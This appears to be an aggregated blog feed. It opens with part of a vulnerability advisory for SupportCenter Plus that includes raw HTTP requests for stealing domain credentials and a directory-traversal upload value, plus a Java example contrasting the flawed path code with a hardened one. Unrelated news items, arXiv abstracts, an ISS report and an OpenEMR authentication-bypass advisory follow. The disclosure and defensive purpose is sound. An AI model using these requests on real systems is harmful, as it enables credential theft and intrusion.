1.) Retrieve the plain text user name and password for the domain account (typically Domain Administrator or similar) used to integrate with Active Directory
2.) Configure arbitrary domains to be used for authentication and import users from these domains (overwriting existing user records)

A low privilege user in SupportCenter Plus can gain privileged access to both the application and any integrated domains.

Typical attack scenarios could include:
1.) SupportCenter Plus is accessible via the internet. An internet based attacker who can gain access to a low privilege account (registering an account if enabled or stealing an account) can gain access to highly privileged domain credentials. The attacker can then use these credentials to gain remote access to the organisation through other means (e.g. VPNs or physically in a meeting room at the organisation).
2.) SupportCenter Plus is not accessible via the internet. An attacker who has gained a low level of compromise in an organisation (i.e. any user who can access SupportCenter Plus) can use these vulnerabilities to escalate themselves to domain administrator or similar.

Pre-requisites and considerations include:
- In order to steal existing domain credentials it is necessary for Active Directory integration to have been setup.
- In order to import users from an attacker controlled domain it is necessary for the SupportCenter Plus server to have network connectivity to the attacker server (i.e. firewall rules may prevent this)
- It is possible to login to SupportCenter Plus using domain authentication even when this option is hidden (typically done so that the domain name isn't displayed on the internet accessible login)

1.2 Directory traversal on file upload (Authenticated)

Low privilege users have the ability to attach files to work order requests (e.g. to attach a screenshot). This functionality is vulnerable to directory traversal and allows low privilege users to upload files to arbitrary directories.

Potential impacts of this vulnerability include:
1.) Remote code execution ***
2.) Denial of service
3.) Uploading malicious static content to web accessible directories (e.g. JavaScript, malware etc)

*** There are two key limitations to this vulnerability that limit any easily exploitable method for code execution through exploiting the underlying JBoss environment:
1.) A Java compiler is not installed as part of SupportCenter Plus which prevents uploaded JSP files from being executed
2.) The uploaded directory always appends an additional directory (named after the user's ID) which prevents deployment of a packaged or unpackaged WAR file (or similar)

Despite the above limitations I cannot conclusively determine that code execution is not possible.

1.3 Reflected cross site scripting (Authenticated)

Multiple authenticated reflected cross site scripting vulnerabilities exist in SupportCenter Plus.

Unsanitised user provided input in the `query` parameter is echoed back to the user during requests to /CustomReportHandler.do. Only administrators (or similar highly privileged) users with access to the custom report functionality are vulnerable to this attack vector.

Unsanitised user provided input in the `compAcct` parameter is echoed back to user during requests to /jsp/ResetADPwd.jsp.

Unsanitised user provided input in the `redirectTo` parameter is echoed back to user during requests to /jsp/CacheScreenWidth.jsp.

All authenticated users are vulnerable to these attack vectors.

Proof of Concept (PoC):
=======================
1.1
The vulnerability can be exploited by remote attackers without user interaction. For security demonstration or to reproduce follow the provided information and steps below.

Manual steps to reproduce the vulnerability ...
1.) Set up an Active Directory domain
2.) Install SupportCenter Plus
3.) Login as an administrator and add a Windows domain and associated credentials
4.) Logout and login as a low privilege user (by default there is guest/guest account)
5.) Attempt to access the above URLs and observe that you can access the functionality with no restrictions (e.g. browse to http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and view the password in the HTML source code)

Plain text domain credentials can be viewed in the HTML source code of the following pages when logged in as low privilege user:
http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP
http://[VULNERABLE]/ImportADUsers.do

Additional domains can be added through browsing to http://[VULNERABLE]/ImportADUsers.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and then selecting "Add New Domain" which will allow you to enter the domain details resulting in a POST similar to this:

POST /EditDomain.do?SUBREQUEST=XMLHTTP HTTP/1.1
Host: [VULNERABLE]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Referer: http://[VULNERABLE]:9090/AdminHome.do
Content-Length: 181
Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; JSESSIONID=C14EA9B74F5D5C7B2F3055EA96F71188; PREV_CONTEXT_PATH=; JSESSIONIDSSO=391CCA5D883203EBE1CD84BEFCB26144
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

name=TESTDOMAIN&isPublicDomain=on&domainController=CONTROLLER&loginName=Administrator&password=Password123&id=1&addButton=&cancel=Cancel&updateButton=Save&cancel=Cancel&description=

Domain users can be imported by browsing to http://[VULNERABLE]/ImportADUsers.do selecting the domain and clicking next. You can then select the Operation Units (OUs) you want to import from the domain and click "Start Import" resulting in a POST similar to this:

POST /ImportADUsers.do HTTP/1.1
Host: [VULNERABLE]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[VULNERABLE]:9090/ImportADUsers.do
Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=; JSESSIONID=96062390B861F5901A937CE3A71A8F4D; JSESSIONIDSSO=C5CBE9C1CB90CEA338318B903BEDE26A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 193

selectedOUs=2&importUser=Start+Import&selectOUs=Next&serverName=CONTROLLER&domainName=TESTDOMAIN&userName=Administrator&userPassword=password123&isRefresh=true&phone=true&mobile=true&job=true&email=true

1.2
The vulnerability can be exploited by remote attackers without user interaction. For security demonstration or to reproduce follow the provided information and steps below.

Files are uploaded via a POST request to /workorder/Attachment.jsp?component=Request

It is possible to manipulate the "module" parameters to traverse directories.

Decompiled source code of the creation of the file path is shown below:

String filePath1 = "Attachments" + filSep + module + filSep + userID1

Note that an additional directory (named after the user's ID) is always appended to file path.

In the below example POST a module value of ../../../../../../../../../../../../ is specified and the logged in user has an ID value of 2. The resulting file in this case is uploaded to c:\2\payload.html on a Windows environment.

An example POST request is shown below:

POST /workorder/Attachment.jsp?component=Request HTTP/1.1
Host: [VULNERABLE]:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[VULNERABLE]:9090/workorder/Attachment.jsp?component=Request
Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=/custom; JSESSIONID=DCB297647A29281C4E80C76898B4B09A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; domainName=TESTDOMAIN; JSESSIONIDSSO=A1E2CBF658231DF263F84A994E27F536
Connection: keep-alive
Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger
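The path construction quoted in section 1.2 of the SupportCenter Plus advisory above, shown next to a hardened form. This is an added example, not the vendor's code or fix and not part of the advisory; the class and method names, the application root and the allow-listed module names are assumptions made for illustration.

```java
import java.io.File;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class AttachmentPathDemo {

    // Assumption: the only module names the upload feature needs to accept.
    private static final Set<String> ALLOWED_MODULES =
            new HashSet<>(Arrays.asList("Request", "Solution"));

    // Same concatenation as the decompiled line in the advisory:
    //   "Attachments" + filSep + module + filSep + userID1
    // The request-supplied module value goes into the path unchecked.
    static Path unsafeDir(Path appRoot, String module, String userId) {
        String filSep = File.separator;
        String filePath = "Attachments" + filSep + module + filSep + userId;
        return appRoot.resolve(filePath).normalize();
    }

    // Hardened form: allow-list the module, require a numeric user ID, then
    // confirm the normalized result is still under the attachment root.
    static Path safeDir(Path appRoot, String module, String userId) {
        if (!ALLOWED_MODULES.contains(module)) {
            throw new SecurityException("module not in allow-list");
        }
        if (userId == null || !userId.matches("[0-9]{1,10}")) {
            throw new SecurityException("user id is not numeric");
        }
        Path base = appRoot.resolve("Attachments").toAbsolutePath().normalize();
        Path dir = base.resolve(module).resolve(userId).normalize();
        // Path.startsWith compares whole path components, not string prefixes.
        // It is a lexical check; if symlinks can exist below the root, also
        // compare toRealPath() of the created directory.
        if (!dir.startsWith(base)) {
            throw new SecurityException("directory escapes the attachment root");
        }
        return dir;
    }

    // The client-supplied file name gets the same treatment: keep only the
    // last path component and reject names that are empty, "." or "..".
    static Path safeFile(Path dir, String clientName) {
        if (clientName == null) {
            throw new SecurityException("missing file name");
        }
        Path name;
        try {
            name = Paths.get(clientName.replace('\\', '/')).getFileName();
        } catch (InvalidPathException e) {
            throw new SecurityException("invalid file name");
        }
        String leaf = (name == null) ? "" : name.toString();
        if (leaf.isEmpty() || leaf.equals(".") || leaf.equals("..")) {
            throw new SecurityException("invalid file name");
        }
        Path file = dir.resolve(leaf).normalize();
        if (!dir.equals(file.getParent())) {
            throw new SecurityException("file escapes the user directory");
        }
        return file;
    }

    public static void main(String[] args) {
        // Constructed application root; nothing is written to disk.
        Path appRoot = Paths.get("supportcenter-demo").toAbsolutePath();
        Path base = appRoot.resolve("Attachments").normalize();

        // Values taken from the advisory's description of the example request.
        String module = "../../../../../../../../../../../../";
        String userId = "2";

        Path unsafe = unsafeDir(appRoot, module, userId);
        System.out.println("unsafe dir:  " + unsafe
                + "  (inside attachment root: " + unsafe.startsWith(base) + ")");

        try {
            safeDir(appRoot, module, userId);
        } catch (SecurityException e) {
            System.out.println("safeDir rejected the advisory's module value: "
                    + e.getMessage());
        }

        Path dir = safeDir(appRoot, "Request", userId);
        System.out.println("safe dir:    " + dir);
        System.out.println("safe file:   " + safeFile(dir, "../../payload.html"));
    }
}
```

Run with `java AttachmentPathDemo.java` (Java 11 or later): the unsafe variant resolves outside the attachment root, while the hardened variant rejects the same module value and reduces a file name containing `../` to its last component.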

Blatter says FIFA officials should pass integrity checks

ZURICH (AP) FIFA President Sepp Blatter says its key officials should be required to pass integrity checks.

from FOX Sports Digital http://ift.tt/1RfGVl2
via IFTTT

Samsung Flaw Lets Hacker Easily Take Control of Your Galaxy Mobile Remotely

More than 600 Million users of Samsung Galaxy smartphones, including the newly released Galaxy S6, are potentially vulnerable to a software bug that allows hackers to secretly monitor the phone's camera and microphone, read text messages and install malicious apps. The vulnerability is due to a problem with the Samsung built-in keyboard app that enables easier predictive text. One of


from The Hacker News http://ift.tt/1Gw2xHg
via IFTTT

Angry Marseille fans call for president's resignation

MARSEILLE, France (AP) With their team facing an uncertain future, angry Marseille supporters have expressed their frustration by tagging walls close to the club's training facilities.

from FOX Sports Digital http://ift.tt/1N8UHpc
via IFTTT

Zero-Day Exploits for Stealing OS X and iOS Passwords

I think you'll agree with me when I say: Apple devices are often considered to be more safe and secure than other devices that run on platforms like Windows and Android, but a recent study will make you think twice before making this statement. A group of security researchers have uncovered potentially deadly zero-day vulnerabilities in both iOS and OS X operating systems that could put


from The Hacker News http://ift.tt/1GvMcSV
via IFTTT

The anonymous artist leaving empowering notes for women

There are two things that anonymous feminist artist Ambivalently Yours does really well: hand-written notes of self-expression to disperse in public ...

from Google Alert - anonymous http://ift.tt/1Lj3GGd
via IFTTT

Brazil has history on its side in U20 World Cup final

AUCKLAND, New Zealand (AP) Brazil will carry a significant edge in experience and a remarkable record of defensive impregnability into Saturday's final against Serbia at the Under-20 World Cup.

from FOX Sports Digital http://ift.tt/1Io2laW
via IFTTT

Tropical Storm Bill Over Texas

Tropical Storm Bill made landfall over Texas at approximately 11:45am CST on June 16, 2015. Shortly after midnight, GPM passed over the storm as it slowly worked its way northward across the already drenched state of Texas. This visualization shows Bill at precisely 12:11:27am CST (6:11:27 GMT) on June 17, 2015. The GPM Core Observatory carries two instruments that show the location and intensity of rain and snow, which defines a crucial part of the storm structure - and how it will behave. The GPM Microwave Imager sees through the tops of clouds to observe how much and where precipitation occurs. The Dual-frequency Precipitation Radar provides the three-dimensional view, showing the structure of the storm spiraling inward toward the center, with heavier rain on the north side of the storm. Shades of blue represent ice in the upper part of clouds. Viewed from the side, the stark color change from blue to green marks the transition from ice to rain. For forecasters, GPM's microwave and radar data are part of the toolbox of satellite data, including other low Earth orbit and geostationary satellites, that they use to monitor tropical cyclones and hurricanes. The addition of GPM data to the current suite of satellite data is timely. Its predecessor precipitation satellite, the Tropical Rainfall Measuring Mission, after 18 years of operation was deorbited June 16 (the same day Tropical Storm Bill made landfall). GPM's new high-resolution microwave imager data and the unique radar data ensure that forecasters and modelers won't have a gap in coverage. GPM is a joint mission between NASA and the Japan Aerospace Exploration Agency. All GPM data products can be found at NASA Goddard's Precipitation Processing Center.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1MQX8vY
via IFTTT

M64: The Black Eye Galaxy


This big, bright, beautiful spiral galaxy is Messier 64, often called the Black Eye Galaxy or the Sleeping Beauty Galaxy for its heavy-lidded appearance in telescopic views. M64 is about 17 million light-years distant in the otherwise well-groomed northern constellation Coma Berenices. In fact, the Red Eye Galaxy might also be an appropriate moniker in this colorful composition. The enormous dust clouds obscuring the near-side of M64's central region are laced with the telltale reddish glow of hydrogen associated with star forming regions. But they are not this galaxy's only peculiar feature. Observations show that M64 is actually composed of two concentric, counter-rotating systems. While all the stars in M64 rotate in the same direction as the interstellar gas in the galaxy's central region, gas in the outer regions, extending to about 40,000 light-years, rotates in the opposite direction. The dusty eye and bizarre rotation is likely the result of a billion year old merger of two different galaxies. via NASA http://ift.tt/1LgCIiu

Thursday, June 18, 2015

[FD] Broken, Abandoned, and Forgotten Code, Part 8

After a brief intermission last week, the Broken, Abandoned series is back with part 8. In this part, we switch back to analyzing the Netgear R6200 upnpd, since that's the ultimate focus of this series. The mystery firmware header gets a name. Also the buffer overflow discussed in part 5 is back, this time without authentication.

Here's the link to part 8: http://ift.tt/1Rd1n6c

For those interested in getting caught up, here's a link to last week's intermission, offering a summary of where we've been and where we're going: http://ift.tt/1BU9YUm

If you missed my post to Full Disclosure where I introduced the series, here's that: http://ift.tt/1F6IUWA

As always I welcome feedback via email or Twitter. I'm @zcutlip.

I hope you enjoy it!

Cheers,
Zach

Source: Gmail -> IFTTT-> Blogger

[FD] SpiderOak.com - Disclosure of sensitive information

[FD] CVE-2015-4453 - Authentication bypass in OpenEMR

Title: Authentication bypass in OpenEMR
CVE Reference: CVE-2015-4453
Product: OpenEMR
Vendor: http://ift.tt/X08Njv
Tested versions: 4.2.0 and 4.2.0 patch 1
Affected versions: 2.8.3 to 4.2.0 patch 1
Status: Fixed by vendor
Reported by: Brian D. Hysell

Details:
A bug in OpenEMR's implementation of "fake register_globals" in interface/globals.php allows an attacker to bypass authentication by sending ignoreAuth=1 as a GET or POST request parameter.

Impact:
An attacker can access sensitive information without a password in parts of the application that do not disable the fake register_globals functionality, do not rely on session data initialized during the login process, and are not governed by access control lists. Notably, this includes interface/fax/fax_dispatch_newpid.php and interface/billing/sl_eob_search.php, which contain unpatched SQL injection vulnerabilities (see CVE-2014-5462).

Remediation:
Apply vendor's latest patch.

Timeline:
Vendor contacted: May 4, 2015
Vendor replied: May 4
CVE requested: May 6
Patch released: May 9
CVE assigned: June 9
Announced: June 18

Source: Gmail -> IFTTT-> Blogger

Peru defeats 10-man Venezuela 1-0 on Claudio Pizarro goal

VALPARAISO, Chile (AP) Claudio Pizarro scored in the 72nd minute to lift Peru to a 1-0 victory Thursday over 10-man Venezuela in a Copa America Group C match.

from FOX Sports Digital http://ift.tt/1HZUkxk
via IFTTT

I have a new follower on Twitter


Tina Long
Marriage is a three ring circus: engagement ring, wedding ring, and suffering.
Houston

Following: 1233 - Followers: 232

June 18, 2015 at 09:03PM via Twitter http://twitter.com/TinaLlong

Emergence of synchrony in an Adaptive Interaction Model. (arXiv:1506.05573v1 [cs.HC])

In a Human-Computer Interaction context, we aim to elaborate an adaptive and generic interaction model in two different use cases: Embodied Conversational Agents and Creative Musical Agents for musical improvisation. To reach this goal, we'll try to use the concepts of adaptation and synchronization to enhance the interactive abilities of our agents and guide the development of our interaction model, and will try to make synchrony emerge from non-verbal dimensions of interaction.



from cs.AI updates on arXiv.org http://ift.tt/1GvltWs
via IFTTT

A hybrid algorithm for Bayesian network structure learning with application to multi-label learning. (arXiv:1506.05692v1 [stat.ML])

We present a novel hybrid algorithm for Bayesian network structure learning, called H2PC. It first reconstructs the skeleton of a Bayesian network and then performs a Bayesian-scoring greedy hill-climbing search to orient the edges. The algorithm is based on divide-and-conquer constraint-based subroutines to learn the local structure around a target variable. We conduct two series of experimental comparisons of H2PC against Max-Min Hill-Climbing (MMHC), which is currently the most powerful state-of-the-art algorithm for Bayesian network structure learning. First, we use eight well-known Bayesian network benchmarks with various data sizes to assess the quality of the learned structure returned by the algorithms. Our extensive experiments show that H2PC outperforms MMHC in terms of goodness of fit to new data and quality of the network structure with respect to the true dependence structure of the data. Second, we investigate H2PC's ability to solve the multi-label learning problem. We provide theoretical results to characterize and identify graphically the so-called minimal label powersets that appear as irreducible factors in the joint distribution under the faithfulness condition. The multi-label learning problem is then decomposed into a series of multi-class classification problems, where each multi-class variable encodes a label powerset. H2PC is shown to compare favorably to MMHC in terms of global classification accuracy over ten multi-label data sets covering different application domains. Overall, our experiments support the conclusions that local structural learning with H2PC in the form of local neighborhood induction is a theoretically well-motivated and empirically effective learning framework that is well suited to multi-label learning. The source code (in R) of H2PC as well as all data sets used for the empirical tests are publicly available.



from cs.AI updates on arXiv.org http://ift.tt/1GTJLuQ
via IFTTT

FastMMD: Ensemble of Circular Discrepancy for Efficient Two-Sample Test. (arXiv:1405.2664v2 [cs.AI] UPDATED)

The maximum mean discrepancy (MMD) is a recently proposed test statistic for two-sample test. Its quadratic time complexity, however, greatly hampers its availability to large-scale applications. To accelerate the MMD calculation, in this study we propose an efficient method called FastMMD. The core idea of FastMMD is to equivalently transform the MMD with shift-invariant kernels into the amplitude expectation of a linear combination of sinusoid components based on Bochner's theorem and Fourier transform (Rahimi & Recht, 2007). Taking advantage of sampling of Fourier transform, FastMMD decreases the time complexity for MMD calculation from $O(N^2 d)$ to $O(L N d)$, where $N$ and $d$ are the size and dimension of the sample set, respectively. Here $L$ is the number of basis functions for approximating kernels which determines the approximation accuracy. For kernels that are spherically invariant, the computation can be further accelerated to $O(L N \log d)$ by using the Fastfood technique (Le et al., 2013). The uniform convergence of our method has also been theoretically proved in both unbiased and biased estimates. We have further provided a geometric explanation for our method, namely ensemble of circular discrepancy, which facilitates us to understand the insight of MMD, and is hopeful to help arouse more extensive metrics for assessing two-sample test. Experimental results substantiate that FastMMD is with similar accuracy as exact MMD, while with faster computation speed and lower variance than the existing MMD approximation methods.



from cs.AI updates on arXiv.org http://ift.tt/1sn15xi
via IFTTT

Multi-Context Models for Reasoning under Partial Knowledge: Generative Process and Inference Grammar. (arXiv:1412.4271v2 [cs.AI] UPDATED)

Arriving at the complete probabilistic knowledge of a domain, i.e., learning how all variables interact, is indeed a demanding task. In reality, settings often arise for which an individual merely possesses partial knowledge of the domain, and yet, is expected to give adequate answers to a variety of posed queries. That is, although precise answers to some queries, in principle, cannot be achieved, a range of plausible answers is attainable for each query given the available partial knowledge. In this paper, we propose the Multi-Context Model (MCM), a new graphical model to represent the state of partial knowledge as to a domain. MCM is a middle ground between Probabilistic Logic, Bayesian Logic, and Probabilistic Graphical Models. For this model we discuss: (i) the dynamics of constructing a contradiction-free MCM, i.e., to form partial beliefs regarding a domain in a gradual and probabilistically consistent way, and (ii) how to perform inference, i.e., to evaluate a probability of interest involving some variables of the domain.



from cs.AI updates on arXiv.org http://ift.tt/1AfcdS7
via IFTTT

Minimizing Regret in Dynamic Decision Problems. (arXiv:1502.00152v2 [cs.AI] UPDATED)

The menu-dependent nature of regret-minimization creates subtleties when it is applied to dynamic decision problems. Firstly, it is not clear whether \emph{forgone opportunities} should be included in the \emph{menu}, with respect to which regrets are computed, at different points of the decision problem. If forgone opportunities are included, however, we can characterize when a form of dynamic consistency is guaranteed. Secondly, more subtleties arise when sophistication is used to deal with dynamic inconsistency. In the full version of this paper, we examine, axiomatically and by common examples, the implications of different menu definitions for sophisticated, regret-minimizing agents.



from cs.AI updates on arXiv.org http://ift.tt/16aDgo7
via IFTTT

Exact Hybrid Covariance Thresholding for Joint Graphical Lasso. (arXiv:1503.02128v2 [cs.LG] UPDATED)

This paper considers the problem of estimating multiple related Gaussian graphical models from a $p$-dimensional dataset consisting of different classes. Our work is based upon the formulation of this problem as group graphical lasso. This paper proposes a novel hybrid covariance thresholding algorithm that can effectively identify zero entries in the precision matrices and split a large joint graphical lasso problem into small subproblems. Our hybrid covariance thresholding method is superior to existing uniform thresholding methods in that our method can split the precision matrix of each individual class using different partition schemes and thus split group graphical lasso into much smaller subproblems, each of which can be solved very fast. In addition, this paper establishes necessary and sufficient conditions for our hybrid covariance thresholding algorithm. The superior performance of our thresholding method is thoroughly analyzed and illustrated by a few experiments on simulated data and real gene expression data.



from cs.AI updates on arXiv.org http://ift.tt/1C0h9xE
via IFTTT

Learning Scale-Free Networks by Dynamic Node-Specific Degree Prior. (arXiv:1503.02129v3 [cs.LG] UPDATED)

Learning the network structure underlying data is an important problem in machine learning. This paper introduces a novel prior to study the inference of scale-free networks, which are widely used to model social and biological networks. The prior not only favors a desirable global node degree distribution, but also takes into consideration the relative strength of all the possible edges adjacent to the same node and the estimated degree of each individual node.

To fulfill this, ranking is incorporated into the prior, which makes the problem challenging to solve. We employ an ADMM (alternating direction method of multipliers) framework to solve the Gaussian Graphical model regularized by this prior. Our experiments on both synthetic and real data show that our prior not only yields a scale-free network, but also produces many more correctly predicted edges than the others such as the scale-free inducing prior, the hub-inducing prior and the $l_1$ norm.



from cs.AI updates on arXiv.org http://ift.tt/185Zcld
via IFTTT

A New Fundamental Evidence of Non-Classical Structure in the Combination of Natural Concepts. (arXiv:1505.04981v2 [cs.AI] UPDATED)

We recently performed cognitive experiments on conjunctions and negations of two concepts with the aim of investigating the combination problem of concepts. Our experiments confirmed the deviations (conceptual vagueness, underextension, overextension, etc.) from the rules of classical (fuzzy) logic and probability theory observed by several scholars in concept theory, while our data were successfully modeled in a quantum-theoretic framework developed by ourselves. In this paper, we isolate a new, very stable and systematic pattern of violation of classicality that occurs in concept combinations. In addition, the strength and regularity of this non-classical effect leads us to believe that it occurs at a more fundamental level than the deviations observed up to now. It is our opinion that we have identified a deep non-classical mechanism determining not only how concepts are combined but, rather, how they are formed. We show that this effect can be faithfully modeled in a two-sector Fock space structure, and that it can be exactly explained by assuming that human thought is the superposition of two processes, a 'logical reasoning', guided by 'logic', and a 'conceptual reasoning' guided by 'emergence', and that the latter generally prevails over the former. All these findings provide a new fundamental support to our quantum-theoretic approach to human cognition.



from cs.AI updates on arXiv.org http://ift.tt/1GnPrxb
via IFTTT

Fox's Van Susteren hits media for 'anonymous trash talkers'

She warned that anonymous sources used in news reports to "trash talk" politicians should know that it isn't difficult to discern their identities.

from Google Alert - anonymous http://ift.tt/1HZxW76
via IFTTT

Orioles Video: Manny Machado's 1st-inning HR is all the offense in 2-1 loss to Phillies; Bud Norris 5 H, 2 ER in 6.0 IP (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Liberia soccer chief announces run for FIFA presidency

LONDON (AP) Liberia's soccer chief launched a bid on Thursday to succeed Sepp Blatter, pledging to eradicate corruption and ensure fans trust FIFA again by being a unifying leader who stops power being concentrated at the top.

from FOX Sports Digital http://ift.tt/1MPNlGq
via IFTTT

Neymar in danger of missing Copa America quarterfinals

SAO PAULO (AP) Neymar could be banned for more than a game because of the red card received after Brazil's 1-0 loss to Colombia in the Copa America.

from FOX Sports Digital http://ift.tt/1FpvTCU
via IFTTT

Liberia FA head Bility announces run for FIFA presidency

LONDON (AP) The president of the Liberia Football Association has announced he is running for the FIFA presidency.

from FOX Sports Digital http://ift.tt/1fkgsXW
via IFTTT

Argentines wanted in FIFA probe turn themselves in

BUENOS AIRES, Argentina (AP) Two Argentine businessmen wanted in the United States in a FIFA bribery case have turned themselves in to authorities.

from FOX Sports Digital http://ift.tt/1BpY1Lg
via IFTTT

Swiss champion Basel hires Urs Fischer as coach

BASEL, Switzerland (AP) Swiss champion Basel has appointed Urs Fischer as coach on a two-year contract.

from FOX Sports Digital http://ift.tt/1ImtY4k
via IFTTT

ISS Daily Summary Report – 6/17/2015

Ocular Health: Kelly and Kornienko performed their Flight Day 90 (FD90) Ocular Health exams. With Padalka assisting in setup and as the Crew Medical Officer (CMO)/Operator, Kelly and Kornienko underwent vision tests, blood pressure readings, tonometry, and each took a vision questionnaire. The Ocular Health protocol calls for a systematic gathering of physiological data to characterize the risk of microgravity-induced visual impairment/intracranial pressure in ISS crewmembers. Researchers believe that the measurement of visual, vascular and central nervous system changes over the course of this experiment and during the subsequent post-flight recovery will assist in the development of countermeasures, clinical monitoring strategies, and clinical practice guidelines.

Japanese Experiment Module Airlock (JEMAL) Operations: Kelly repressed the JEMAL and following a leak check, opened the inner hatch and retracted the Slide Table (ST) into the JEM Pressurized Module (JPM). He then removed the Free Space Passive Dosimeter for Life-Science Experiments in Space (PADLES) from the Multi-Purpose Experiment Platform (MPEP) and packed them for return. Free-Space PADLES is an investigation that uses a Sealed Free-Space Dosimeter to measure radiation doses outside the International Space Station (ISS). The obtained results are used for verification of the ISS hull wall shielding contribution, and a benchmark study to develop existing simulation codes and space radiation models for present, and future, human space flight activities.

Rodent Research-2 (RR2) Microgravity Science Glovebox (MSG) Cleanup: Kelly completed the first of two cleanup sessions following the completion of RR2. Deployed hardware used during the RR-2 activities was cleaned and stowed in its nominal location and consumables were disposed of. The MSG will next be used tomorrow, when Padalka installs the Observation Analysis of Smectic Islands in Space (OASIS) experiment.

Today’s Planned Activities
All activities were completed unless otherwise noted.
IDENTIFIKATSIYA. Copy ИМУ-Ц micro-accelerometer data to laptop Replacement of ГА DC Filter Unit (БФ) Install No.062 VIS Vision Test Ocular Health – Vision Test using tonometer (Setup) Ocular Health – Blood Pressure Operations Ocular Health – Tonometry Test VIS Vision Questionnaire JEMAL – Pressurization Checking Laptop “Operation Mode” Display after Replacement of ГА DC Filter Unit (БФ) Ocular Health – Blood Pressure Operations Ocular Health – Tonometry Test – Crew Medical Officer JEMAL – Leak Check after Pressurization VIS Vision Questionnaire XF305 – Camcorder Setup JEM Airlock Slide Table (ST) Extension to JPM Side Test activation of Vozdukh Atmosphere Purification System Emergency Vacuum Valves [АВК СОА] Verification of ИП-1 Flow Sensor Position MPEP – Dosimeter Removal СОЖ Maintenance DATA TRANSMISSION RADIO LINK (РСПИ) БЗУ Software Upgrade OASIS – Overview HXP – Adapter Removal JEM – Slide Table Retraction Ocular Health – Vision Test using tonometer (Stowage) Preparing for Photography of EV1 (DC1) and EV1 (MRM2) Window Glass MSG – Activation of MSG glove box PROBOY. RSЕ1 Laptop Ops. PROBOY. Penetration Simulator Ops. Rodent Research (RR) – MSG Cleanup PROBOY. Copy and Downlink Data Photography of EV1 (DC1) and EV1 (MRM2) Window Glass. Photo Downlink OBSTANOVKA. Equipment setup. Crew Prep for PAO PAO Hardware Setup OBSTANOVKA. Re-mate Telemetry connectors. OBSTANOVKA. Measuring Feeder 29, 30 БСКЭ5-32 power voltage and current consumption PAO Event Vacuum Cleaning СКПФ1, СКПФ2 Dust Filters and MRM1 ГЖТ Rodent Research (RR) – MSG Cleanup OBSTANOVKA. Re-mate Telemetry connectors. OBSTANOVKA. Closeout Ops. Flight Director / ISS Crew Tagup

Completed Task List Items: None

Ground Activities
All activities were completed unless otherwise noted.
Ocular Health (Tonometry) ops
Meteron commanding

Three-Day Look Ahead:
Thursday, 06/18: RR Microgravity Science Glovebox LSAH cleanup, Ocular Health, OASIS setup
Friday, 06/19: Ocular Health, CUCU/CCP checkout, SPX-7 OBT RoBOT training
Saturday, 06/20: Crew off duty, housekeeping

QUICK ISS Status – Environmental Control Group:
Component: Status
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): On
[СКВ] 2 – SM Air Conditioner System (“SKV2”): Off
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Shutdown
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Standby
Urine Processing Assembly (UPA): Standby
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/1SreymE
via IFTTT

Greece: Olympiakos chairman released on bail

ATHENS, Greece (AP) The chairman of Greek champion Olympiakos has been suspended from sporting activities and released on bail after testifying at an investigation into alleged corruption in Greek football.

from FOX Sports Digital http://ift.tt/1G6QcXu
via IFTTT

Belgium weighs compensation claim for losing World Cup bid

BRUSSELS (AP) Belgium's football federation could seek compensation for the money spent on its unsuccessful bid for the 2018 World Cup if there is evidence of criminal wrongdoing in FIFA's choice of Russia as host.

from FOX Sports Digital http://ift.tt/1JWHMs2
via IFTTT

Marseille signs France U21 midfielder Nkoudou

MARSEILLE, France (AP) Marseille has signed France Under-21 midfielder Georges-Kevin Nkoudou from French league rival Nantes.

from FOX Sports Digital http://ift.tt/1G6MIo0
via IFTTT

Anonymous Claims Responsibility for Cyber Attack on Canadian Government Websites

An online hacking collective claiming to be a wing of Anonymous took responsibility for shutting down major Canadian government websites on ...

from Google Alert - anonymous http://ift.tt/1L1LSyd
via IFTTT

M45: The Pleiades Star Cluster


